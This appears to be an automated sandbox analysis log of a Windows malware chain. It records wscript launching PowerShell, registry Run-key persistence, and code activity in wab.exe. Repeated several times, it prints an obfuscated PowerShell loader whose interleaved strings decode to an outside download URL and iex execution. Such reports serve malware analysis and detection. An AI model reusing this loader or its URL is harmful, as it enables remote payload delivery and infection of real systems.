Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348A00BD pushad ; iretd 2_2_00007FFD348A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34975479 push ebp; iretd 2_2_00007FFD34975538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34976DCA push eax; iretd 2_2_00007FFD34976DCD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_079C1FB2 push eax; mov dword ptr [esp], ecx 5_2_079C21B4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA2806 push ecx; ret 11_2_20EA2819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EB1219 push esp; iretd 11_2_20EB121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044693D push ecx; ret 16_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00451D54 push eax; ret 16_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00451D34 push eax; ret 17_2_00451D41
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00444E71 push ecx; ret 17_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00414060 push eax; ret 18_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00414060 push eax; ret 18_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00414039 push ecx; ret 18_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Likvidationsprovenuet Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Likvidationsprovenuet Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 17_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
